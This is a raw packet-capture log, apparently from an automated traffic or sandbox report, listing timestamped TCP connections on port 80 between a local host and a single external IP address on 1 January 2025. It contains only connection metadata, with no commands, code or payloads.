                                                                                                                  Jan 1, 2025 15:02:23.588295937 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.634053946 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.778522968 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.778872013 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.783488035 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.783564091 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.783795118 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.783821106 CET8049757104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.783916950 CET4975780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.788602114 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.904853106 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.909756899 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:23.909840107 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.909970999 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:23.914690971 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.135597944 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.140544891 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.140678883 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.228458881 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.259387970 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.266453028 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.274669886 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.355937958 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.402503014 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.527369976 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.571727037 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.609911919 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.683837891 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.726068974 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.726162910 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.726874113 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.731030941 CET8049759104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.731093884 CET4975980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.731753111 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.731848001 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.731966972 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.736011028 CET8049758104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:24.736067057 CET4975880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:24.739351034 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.087332964 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.092230082 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.192478895 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.243549109 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.455626011 CET8049760104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.509066105 CET4976080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.600737095 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.606178999 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.606286049 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.606446028 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.611578941 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:25.962294102 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:25.967255116 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.083607912 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.134064913 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.335973978 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.384054899 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.463171959 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.463898897 CET4976280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.468262911 CET8049761104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:26.468327999 CET4976180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:26.468744040 CET8049762104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.049997091 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.399832010 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.404791117 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.500730038 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.540376902 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.746628046 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.790388107 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.866216898 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.866878986 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.871325016 CET8049777104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.871404886 CET4977780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.871668100 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:37.871722937 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.871830940 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:37.876631021 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.228027105 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.232918024 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.317608118 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.368567944 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.596086025 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.649800062 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.710607052 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.711368084 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.715801954 CET8049778104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.715903044 CET4977880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.718494892 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:38.718581915 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.718750954 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:38.724594116 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.072726011 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.078142881 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.203114033 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.259147882 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.471451044 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.524734020 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.601403952 CET4977680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.603240013 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.603945971 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.608258009 CET8049779104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.608349085 CET4977980192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.608795881 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.608897924 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.608958960 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.613769054 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:39.962810993 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:39.967746019 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.052577019 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.102914095 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.222353935 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.274751902 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.348695040 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.349359035 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.353837967 CET8049780104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.354295015 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.354379892 CET4978080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.354398012 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.355659962 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.360508919 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.370906115 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.376913071 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.377032995 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.377151966 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.382081032 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.712382078 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.717360973 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.727986097 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.732892036 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.733053923 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.826877117 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.832379103 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:40.868485928 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:40.884113073 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.078521967 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.083671093 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.088488102 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.088598013 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.089473963 CET8049782104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.089550018 CET4978280192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.134156942 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.210155964 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.210813046 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.215209007 CET8049781104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.215289116 CET4978180192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.215656042 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.215729952 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.215852976 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.220730066 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.579030037 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.584017992 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.659877062 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.712232113 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:41.938122988 CET8049783104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:41.993541956 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.054383039 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.059264898 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.060029030 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.060158014 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.064922094 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.417262077 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.422161102 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.507689953 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.556024075 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.760242939 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:42.777708054 CET4978380192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:42.806044102 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.008699894 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.010380030 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.013843060 CET8049784104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.013911009 CET4978480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.015218019 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.015275955 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.015460968 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.020252943 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.368752956 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.373930931 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.468702078 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.509128094 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.732553959 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.777116060 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.850850105 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.851793051 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.856729031 CET8049785104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.857675076 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:43.857762098 CET4978580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.857810974 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.857980013 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:43.863739967 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.212551117 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.217473984 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.306744099 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.352900028 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.568521023 CET8049786104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.618557930 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.694891930 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.699767113 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:44.700100899 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.700172901 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:44.704971075 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.056160927 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.061157942 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.147562027 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.196791887 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.397454977 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.446827888 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.520356894 CET4978680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.527586937 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.528223038 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.532699108 CET8049787104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.532759905 CET4978780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.533070087 CET8049788104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.533139944 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.533315897 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.538146973 CET8049788104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:45.885040998 CET4978880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:45.889904022 CET8049788104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.649919987 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.654714108 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.737859011 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.790452003 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:56.912230015 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:56.962342024 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.038079977 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.038774014 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.043076038 CET8049810104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.043133974 CET4981080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.043781996 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.043844938 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.043950081 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.048693895 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.404722929 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.409866095 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.488173962 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.540548086 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.603924990 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.605209112 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.608944893 CET8049815104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.609025002 CET4981580192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.610088110 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.610148907 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.610253096 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.615066051 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.731378078 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.736258030 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.736319065 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.736423016 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.741153002 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.962969065 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:57.968010902 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:57.968039989 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.063896894 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.087512016 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.092426062 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.118571043 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.189572096 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.243653059 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.340087891 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.384238005 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.454675913 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.509186029 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.585469007 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.585639000 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.586571932 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.590689898 CET8049817104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.591042042 CET8049818104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.591099977 CET4981780192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.591108084 CET4981880192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.591350079 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.593055010 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.593240023 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.597953081 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:58.947052002 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:58.951857090 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.051121950 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.102984905 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.312905073 CET8049826104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.368566990 CET4982680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.451483965 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.456295013 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.456365108 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.456517935 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.461271048 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.816833973 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:02:59.821681023 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:02:59.985574007 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.040472031 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.271431923 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.321712017 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.405289888 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.405987978 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.410301924 CET8049834104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.410351992 CET4983480192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.410846949 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.410914898 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.411031961 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.415832996 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.759402037 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:00.764254093 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.865242004 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:00.915544033 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:01.120338917 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:01.165479898 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:01.240154982 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:01.240833998 CET4984680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:01.245155096 CET8049840104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:01.245803118 CET8049846104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:01.245868921 CET4984080192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:01.245892048 CET4984680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:01.246016026 CET4984680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:01.250786066 CET8049846104.21.38.84192.168.2.4
                                                                                                                  Jan 1, 2025 15:03:01.603075981 CET4984680192.168.2.4104.21.38.84
                                                                                                                  Jan 1, 2025 15:03:01.609520912 CET8049846104.21.38.84192.168.2.4
